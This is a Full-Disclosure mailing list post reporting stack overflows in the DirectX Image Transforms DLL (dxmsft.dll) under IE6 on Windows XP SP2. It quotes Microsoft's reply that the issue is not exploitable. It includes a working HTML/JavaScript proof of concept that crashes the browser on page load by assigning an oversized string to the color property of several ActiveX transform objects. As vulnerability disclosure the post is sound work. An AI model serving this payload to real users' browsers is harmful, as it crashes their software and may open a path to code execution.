There are multiple stack overflows in dxmsft.dll version 6.3.2900.3199(Image
DirectX Transforms). This DLL exposes DirectX Image Transform objects which are
safe for scripting. The issue is with the Color property of certain objects, so
I am assuming this property is inherited from a base interface.
This affects WindowsXP SP2 IE6(fully patched), I have not tested this on
IE7 and it does not appear to affect Windows Server 2003 R2 SP2(newer version
of the dxmsft.dll). I have not tested code execution, though it may be
possible. I received the following response from Microsoft:
---
From our investigation this issue was found to be a stability problem which is
not exploitable. The net effect of this issue is that IE will become
unresponsive. The underlying operating system will still respond and Killing
the process will stop the local DoS.
---
It did not hang IE on my machine, but instead crashed IE with a stack overflow.
This may be related to http://www.securityfocus.com/bid/19029/.
PoC as follows:
---------------------
<!--
written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = "AAAA";
while (s.length < 999999) s=s+s;
var obj = new ActiveXObject("DXImageTransform.Microsoft.Chroma");
obj.color = s;
var obj = new ActiveXObject("DXImageTransform.Microsoft.DropShadow");
obj.color = s;
var obj = new ActiveXObject("DXImageTransform.Microsoft.Glow");
obj.color = s;
var obj = new ActiveXObject("DXImageTransform.Microsoft.MaskFilter");
obj.color = s;
var obj = new ActiveXObject("DXImageTransform.Microsoft.Shadow");
obj.color = s;
}
</script>
</head>
<body onload="JavaScript: return Check();" />
</html>
---------------------
Elazar
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
